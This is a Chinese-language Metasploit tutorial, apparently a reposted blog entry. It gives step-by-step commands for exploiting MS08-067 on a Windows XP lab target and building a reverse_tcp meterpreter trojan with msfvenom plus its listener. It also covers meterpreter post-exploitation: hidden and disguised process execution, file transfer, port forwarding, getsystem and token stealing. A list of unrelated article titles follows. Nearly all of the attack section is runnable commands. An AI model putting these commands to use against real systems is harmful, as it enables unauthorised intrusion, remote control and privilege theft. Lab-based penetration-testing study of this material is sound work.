【msf】 msfconsole meterpreter

对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程

对于msfconsole, Kali Linux 自带。只需用命令行启动便可。

msfconsole 启动不了/初次使用

service postgresql start     # 启动数据库服务
msfdb init             # 初始化数据库
msfconsole             # 启动metasploit

【注】msfconsole 不会就用 msfconsole -h msf5 > help 查看帮助

ms08-067漏洞攻击实践

ifconfig 命令 可 查看kail 系统ip ipconfig 查看 Windows ip

kali: 192.168.xxx.xxx (攻击靶机)

windows xp xxx : 192.168.xxx.xxx (被攻击靶机)

msfconsole - 进入

msfconsole

红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块

search - 查看漏洞

search ms08_067

use - 使用漏洞

use exploit/windows/smb/ms08_067_netapi

show - 查看可以攻击的靶机操作系统型号(targets)

show targets

set - 设置target 参数

xx是对应被攻击靶机的型号

set target xx

set - 设置rhost参数

此ip为被攻击靶机的ip地址

set rhost 192.168.xxx.xxx

show - 查看参数

show options

exploit - 进行攻击

exploit

session 查看目前服务器端会话

sessions -i

启动x会话 。

sessions -i x

之后用 meterpreter 命令,转 shell 命令

shell

back - 实现返回

back

查看 payload

show payloads

利用msfvenom生成木马攻击靶场

【参考链接】: i春秋 Meterpreter综合提权

msfvenom 生成 .exe 文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木马反弹到的监听端地址=192.168.xxx.xxx
lport :监听端口=yyyy

常见 msfvenom 命令参数如下:

-p 选择一个载荷(payload)

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-h 帮助

用msfconsole监听

选用 exploit/multi/handler 监听模块

use exploit/multi/handler

设置payload:

set payload windows/x64/meterpreter/reverse_tcp

设置 监听ip地址以及监听端口:

set lhost 192.168.xxx.xxx

set lport yyyy

查看设置参数:

show options

开启配置模块进行监听

exploit

Meterpreter

Meterpreter命令详解

常见命令

upload - 上传文件

上传1.txt到目标靶机c:\muma\下

upload 1.txt c:\\muma\\

download - 下载目标靶机相对应权限的任意路径下的文件

命令 download file path

download c:\\muma\\1.txt

sysinfo 命令:

显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。

运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上

execute  -H -i -f cmd.exe
execute  -H -m -d notepad.exe-f  muma.exe -a "-o muma.txt"

-d 在目标主机执行时显示的进程名称(用以伪装)

-m 直接从内存中执行

"-o muma.txt"是muma.exe的运行参数

网络命令

portfwd 命令:

portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy

netstat -an | grep"yyyy" #查看指定端口开放情况

基础提权

getsystem

利用 ps 命令查看目标靶机当前进程

找到管理员相应PID。若PID:xxxx

steal_token xxxx
#盗取guanliyuan
getuid
#检查是否成功
shell

【侵权删】

【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html

最新文章

  1. PHP 基础(赋值及函数)
  2. 2016 ACM赛后总结
  3. Cwinux源码解析系列
  4. Apache commons-codec笔记
  5. NEC学习 ---- 模块 - tab[含标题]
  6. viewPager动态加载listview数据
  7. iOS项目中常用的第三方开源库
  8. golang 远程传输文件
  9. Vim 学习资料
  10. H264学习第一篇(编码结构分析)
  11. CreateLiveCMSV4.0 漏洞,无需后台Get shell
  12. (转)Python 遍历List三种方式
  13. 06jQuery-05-事件
  14. coursera普林斯顿算法课part1里Programming Assignment 2最后的extra challenge
  15. C# AddRange为数组添加多个元素的代码
  16. Arrange the Bulls [POJ2441] [状压DP]
  17. 如何为 SpringMVC 编写单元测试:普通 Controller 测试(转)
  18. 层层递进Struts1(三)之Struts组成
  19. Oracle体系结构及备份(十六)——bg-ckpt
  20. 电子商务(电销)平台中用户模块(User)数据库设计明细

热门文章

  1. 《Kafka笔记》3、Kafka高级API
  2. Helium文档15-WebUI自动化-chromedriver问题
  3. Linux命令之Hash缓存表
  4. RocketMQ主从搭建
  5. PowerShell查看历史记录
  6. CorelDRAW x4 提示非法软件产品被禁用解决方法教程
  7. idea2019注册码,亲测可用(暂时不可用)!
  8. python打印水仙花数的个人总结
  9. python实现登录验证系统(搭建MVC框架)
  10. git/SQL/正则表达式的在线练习网站